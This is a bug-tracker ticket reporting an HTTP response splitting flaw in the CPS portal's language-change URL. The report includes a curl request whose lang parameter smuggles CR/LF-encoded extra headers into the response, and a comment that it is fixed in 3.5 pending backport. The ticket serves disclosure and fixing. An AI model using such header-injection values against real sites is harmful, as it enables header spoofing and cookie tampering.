Ticket #2151 (new defect)

Opened 10 years ago

Last modified 10 years ago

HTTP response splitting condition

Reported by: gracinet Owned by: jmorliaguet
Priority: P1 Milestone: CPS 3.4.10
Component: CPSPortlets Version: TRUNK
Severity: major Keywords: security http header


On the language change URL, by putting CR/LF in the lang parameter, one can spoof the response headers. Curl session extract reproducing this:

> GET /cps/Localizer/cpsportlet_change_language?lang=Foobar%3f%0d%0aEvilHeader:%20EvilValue%2f1%2e2%2d3%0d%0aSecondEvilHeader:%20whatever" HTTP/1.1
> User-Agent: curl/7.16.4 (i386-apple-darwin9.0) libcurl/7.16.4 OpenSSL/0.9.7l zlib/1.2.3
> Host: localhost:8080
> Accept: */*
< HTTP/1.1 302 Moved Temporarily
< Server: Zope/(Zope 2.9.8-final, python 2.4.4, darwin) ZServer/1.1 CPS/CPS.3.5.1-devel
< Date: Thu, 06 May 2010 07:28:34 GMT
< Content-Length: 0
< Location: 
< Set-Cookie: LOCALIZER_LANGUAGE="Foobar?
< EvilHeader: EvilValue/1.2-3
< SecondEvilHeader: whatever""; Path=/cps
< Set-Cookie: _ZopeId="52057246A4X2YJE8GmY"; Path=/

Change History

comment:1 Changed 10 years ago by gracinet

 Fixed in 3.5 default branch.

Need to backport the 3.4 branch.

This Script (python) hasn't changed since 2005, the same patch can therefore be applied on existing projects.

Note: See TracTickets for help on using tickets.